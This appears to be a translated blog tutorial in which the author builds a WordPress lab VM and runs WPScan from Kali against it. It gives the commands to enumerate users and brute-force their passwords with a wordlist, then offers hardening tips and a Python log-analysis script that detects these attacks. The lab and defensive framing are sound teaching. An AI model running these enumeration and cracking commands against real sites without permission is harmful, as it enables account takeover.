Disclaimer: This document is for safe learning and teaching purposes only and must not be used unlawfully.
WPScan: the WordPress black-box scanner
Experimental results: enumerate the user list and brute-force user passwords.
Lab Environment:
Target machine: TurnKey Linux (WordPress version)
Attacking machine: Kali Linux 2.0
Experimental steps:
1. Download the image: on the official website https://www.turnkeylinux.org/, search for WordPress and download the TurnKey Linux image that contains only WordPress.
2. Install it in a virtual machine. The steps are the same as for a normal system installation, with additional steps to configure WordPress during installation, such as the MySQL root user password, the WordPress admin password, the admin user's email (use the default), and initializing the Hub information (click Skip). When the WORDPRESS Appliance Services page appears, the installation was successful. This page shows details of the WordPress app services, such as the Web address, the Web shell address and port, the Webmin address, the phpMyAdmin address and port, and the SSH/SFTP address and port.
[Screenshot: WordPress appliance services]
(In an actual penetration test, assume that you have already found the WordPress site and some other information.)
1. Update the vulnerability database: wpscan --update
2. Scan the target host for possible vulnerabilities: wpscan -u http://192.168.61.133
3. Enumerate the list of user names: wpscan -u 192.168.61.133 -e u vp
4. Use a dictionary to crack a user's password:
wpscan -u 192.168.61.133 -e u --wordlist /root/wordlist.txt
Results: [screenshot of the scan results]
How to prevent WordPress users from being enumerated
Do not use usernames as nicknames, and do not choose usernames that are already publicly known. The best approach is to choose a username that contains random characters and to use a different name as the nickname. WPScan scans URLs to obtain usernames, so if you do not use the username there, it will certainly not be found by WPScan.
How to prevent WordPress passwords from being brute-forced
The best way to avoid brute force is to limit the number of login attempts per IP address. The latest version of WordPress has this option by default. Make sure the attempt limit is at most 3, and enable the lockout function (i.e. lock after 6 password attempts).
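The two mitigations above can also be monitored from the web server side. The following Python code is an added example, not part of the original post: it scans access-log lines and flags any IP address that exceeds the 3-attempt login limit or requests several author IDs in a row. The Apache combined log format, the /wp-login.php and ?author=N request patterns, the 5-minute window, the author-ID threshold and all sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines in Apache combined format (not from the post).
# 192.168.61.128 stands in for the scanning host; 192.168.61.1 is a normal user.
SAMPLE_LOG = """\
192.168.61.128 - - [25/Jan/2016:10:00:01 +0800] "GET /?author=1 HTTP/1.1" 301 0 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:00:01 +0800] "GET /?author=2 HTTP/1.1" 301 0 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:00:02 +0800] "GET /?author=3 HTTP/1.1" 404 0 "-" "-"
192.168.61.1 - - [25/Jan/2016:10:01:10 +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"
192.168.61.1 - - [25/Jan/2016:10:01:25 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:02:00 +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:02:01 +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:02:02 +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"
192.168.61.128 - - [25/Jan/2016:10:02:03 +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")

def parse(log):
    """Yield (ip, time, method, path, status) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, path, status = m.groups()
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield ip, when, method, path, int(status)

def detect(log, max_failures=3, window=timedelta(minutes=5), max_author_ids=2):
    """Return {ip: set of alert names} for IPs that exceed either threshold."""
    failures, author_ids, alerts = defaultdict(list), defaultdict(set), defaultdict(set)
    for ip, ts, method, path, status in parse(log):
        # A failed WordPress login re-renders the form (200); success redirects (302).
        if method == "POST" and path.startswith("/wp-login.php") and status == 200:
            failures[ip] = [t for t in failures[ip] if ts - t <= window] + [ts]
            if len(failures[ip]) > max_failures:
                alerts[ip].add("brute-force")
        m = AUTHOR_RE.search(path)
        if method == "GET" and m:
            author_ids[ip].add(m.group(1))  # distinct author IDs requested
            if len(author_ids[ip]) > max_author_ids:
                alerts[ip].add("user-enumeration")
    return dict(alerts)

if __name__ == "__main__":
    for ip, kinds in detect(SAMPLE_LOG).items():
        print(ip, sorted(kinds))
```

The user at 192.168.61.1 mistypes a password once and then logs in, so it stays under the limit and is not flagged.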
TurnKey Linux is a Linux distribution based on Ubuntu 8.04 LTS.
TurnKey Linux is an Ubuntu-based virtual appliance library that integrates some of the best open source software into fully usable solutions. Each virtual appliance is optimized for ease of use and can be deployed on bare metal, in virtual machines, and in the cloud in minutes. Each virtual appliance is available as a disc image or a virtual machine image, and the growing list of appliances includes Bugzilla, Django, Drupal, File Server, Joomla, LAMP, Magento, Mantis, MediaWiki, MoinMoin, Moodle, MovableType, MySQL, Openbravo, PhpBB, PostgreSQL, ProjectPier, Rails, Revision Control, StatusNet, Apache Tomcat, Torrent Server, Trac, TWiki, Vtiger, WordPress, Zimbra and others.
This article is from the "Inner Peace" blog; please keep this source attribution: http://isnull.blog.51cto.com/10388625/1738187
Use WPScan to scan WordPress for user passwords